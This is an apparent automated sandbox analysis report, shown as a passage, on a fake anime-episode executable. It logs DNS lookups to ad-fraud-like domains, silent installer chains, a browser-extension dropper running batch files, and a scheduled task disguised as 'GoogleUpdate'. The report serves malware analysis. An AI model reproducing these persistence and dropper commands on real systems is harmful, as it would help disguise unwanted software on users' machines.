                                                                        kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                        comctl32.dllInitCommonControls
                                                                        version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                        user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                        oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                        netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                        advapi32.dllRegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                                                                        Exports

                                                                        NameOrdinalAddress
                                                                        TMethodImplementationIntercept30x454060
                                                                        __dbk_fcall_wrapper20x40d0a0
                                                                        dbkFCallWrapperAddr10x4be63c

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        DutchNetherlands
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 2, 2023 15:35:51.447508097 CET5394353192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:51.447860003 CET5608653192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:51.448110104 CET5654753192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:51.467344046 CET53539438.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:51.470752954 CET53565478.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:51.473227978 CET53560868.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:51.910753965 CET5891753192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:51.951704979 CET53589178.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:51.977530003 CET5034353192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:51.999813080 CET53503438.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:53.253860950 CET6183353192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:53.254240036 CET6504453192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:53.254362106 CET6003253192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:53.273595095 CET53600328.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:53.275439024 CET53618338.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:53.277432919 CET53650448.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:53.656277895 CET4923253192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:53.673979044 CET53492328.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:54.438354969 CET5975253192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:54.456315041 CET53597528.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:55.108158112 CET5732253192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:55.126245022 CET53573228.8.8.8192.168.2.6
                                                                        Jan 2, 2023 15:35:55.151082039 CET6295853192.168.2.68.8.8.8
                                                                        Jan 2, 2023 15:35:55.169292927 CET53629588.8.8.8192.168.2.6

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 2, 2023 15:35:51.447508097 CET192.168.2.68.8.8.80x76e9Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.447860003 CET192.168.2.68.8.8.80x356eStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.448110104 CET192.168.2.68.8.8.80xf14bStandard query (0)smashbrowser.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.910753965 CET192.168.2.68.8.8.80x9379Standard query (0)chrome.google.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.977530003 CET192.168.2.68.8.8.80xfdc2Standard query (0)exturl.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.253860950 CET192.168.2.68.8.8.80x8e6bStandard query (0)offersss.clickA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.254240036 CET192.168.2.68.8.8.80xd0cStandard query (0)offerszzzz.clickA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.254362106 CET192.168.2.68.8.8.80xb6c0Standard query (0)s10.histats.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.656277895 CET192.168.2.68.8.8.80xe7c0Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:54.438354969 CET192.168.2.68.8.8.80xc58dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:55.108158112 CET192.168.2.68.8.8.80x66e1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:55.151082039 CET192.168.2.68.8.8.80x41f4Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 2, 2023 15:35:51.467344046 CET8.8.8.8192.168.2.60x76e9No error (0)accounts.google.com172.217.168.45A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.470752954 CET8.8.8.8192.168.2.60xf14bNo error (0)smashbrowser.com188.114.97.3A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.470752954 CET8.8.8.8192.168.2.60xf14bNo error (0)smashbrowser.com188.114.96.3A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.473227978 CET8.8.8.8192.168.2.60x356eNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.473227978 CET8.8.8.8192.168.2.60x356eNo error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.951704979 CET8.8.8.8192.168.2.60x9379No error (0)chrome.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.951704979 CET8.8.8.8192.168.2.60x9379No error (0)www3.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:51.999813080 CET8.8.8.8192.168.2.60xfdc2No error (0)exturl.com38.128.66.115A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.273595095 CET8.8.8.8192.168.2.60xb6c0No error (0)s10.histats.coms10.histats.com.web.cdn.anycast.meCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.273595095 CET8.8.8.8192.168.2.60xb6c0No error (0)s10.histats.com.web.cdn.anycast.me46-105-201-240.any.cdn.anycast.meCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.273595095 CET8.8.8.8192.168.2.60xb6c0No error (0)46-105-201-240.any.cdn.anycast.me46.105.201.240A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.275439024 CET8.8.8.8192.168.2.60x8e6bNo error (0)offersss.click38.128.66.115A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.277432919 CET8.8.8.8192.168.2.60xd0cNo error (0)offerszzzz.click38.128.66.115A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:53.673979044 CET8.8.8.8192.168.2.60xe7c0No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:54.456315041 CET8.8.8.8192.168.2.60xc58dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:55.126245022 CET8.8.8.8192.168.2.60x66e1No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                                        Jan 2, 2023 15:35:55.169292927 CET8.8.8.8192.168.2.60x41f4No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:15:34:36
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        Imagebase:0x400000
                                                                        File size:25461096 bytes
                                                                        MD5 hash:71EABE2172181C2E4517C30C22CB6D12
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:1
                                                                        Start time:15:34:38
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe"
                                                                        Imagebase:0x400000
                                                                        File size:3014144 bytes
                                                                        MD5 hash:F16A37D7AF3DB8C75F19AF9B3453D9C8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:2
                                                                        Start time:15:34:40
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
                                                                        Imagebase:0x400000
                                                                        File size:25461096 bytes
                                                                        MD5 hash:71EABE2172181C2E4517C30C22CB6D12
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:3
                                                                        Start time:15:34:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
                                                                        Imagebase:0x400000
                                                                        File size:3014144 bytes
                                                                        MD5 hash:F16A37D7AF3DB8C75F19AF9B3453D9C8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:4
                                                                        Start time:15:34:48
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quiet
                                                                        Imagebase:0x10000
                                                                        File size:25466016 bytes
                                                                        MD5 hash:703BD677778F2A1BA1EB4338BAC3B868
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        General

                                                                        Target ID:5
                                                                        Start time:15:34:49
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet
                                                                        Imagebase:0xb0000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate

                                                                        General

                                                                        Target ID:7
                                                                        Start time:15:34:56
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372
                                                                        Imagebase:0xe70000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate

                                                                        General

                                                                        Target ID:15
                                                                        Start time:15:34:59
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                        Imagebase:0x7ff6dc900000
                                                                        File size:66048 bytes
                                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:16
                                                                        Start time:15:35:11
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /burn.runonce
                                                                        Imagebase:0x7ff603c50000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate

                                                                        General

                                                                        Target ID:17
                                                                        Start time:15:35:13
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
                                                                        Imagebase:0xc20000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        General

                                                                        Target ID:18
                                                                        Start time:15:35:14
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
                                                                        Imagebase:0xc20000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:19
                                                                        Start time:15:35:23
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:20
                                                                        Start time:15:35:23
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:25
                                                                        Start time:15:35:25
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9F679354-B01C-4132-8C3B-9D0B8BAD9686} {7ADE5D70-631D-453D-B602-70E5C1B36EAF} 3732
                                                                        Imagebase:0xc20000
                                                                        File size:650568 bytes
                                                                        MD5 hash:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:27
                                                                        Start time:15:35:26
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:28
                                                                        Start time:15:35:27
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:29
                                                                        Start time:15:35:27
                                                                        Start date:02/01/2023
                                                                        Path:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140
                                                                        Imagebase:0x10000
                                                                        File size:654624 bytes
                                                                        MD5 hash:CAA6E1DCAE648CE17BC57A5B7D383CC8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:30
                                                                        Start time:15:35:39
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe" install
                                                                        Imagebase:0x7ff6c2df0000
                                                                        File size:146560 bytes
                                                                        MD5 hash:6B435C6EA00DA06603EA9927D489AB6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:31
                                                                        Start time:15:35:40
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
                                                                        Imagebase:0x7ff7cb270000
                                                                        File size:273920 bytes
                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:32
                                                                        Start time:15:35:40
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6da640000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:33
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
                                                                        Imagebase:0x7ff6b71a0000
                                                                        File size:226816 bytes
                                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:34
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        Imagebase:0x7ff6c2df0000
                                                                        File size:146560 bytes
                                                                        MD5 hash:6B435C6EA00DA06603EA9927D489AB6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:35
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\WindowsApp\reg.bat" install
                                                                        Imagebase:0x7ff7cb270000
                                                                        File size:273920 bytes
                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:36
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6da640000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        General

                                                                        Target ID:37
                                                                        Start time:15:35:41
                                                                        Start date:02/01/2023
                                                                        Path:C:\Windows\System32\schtasks.exe
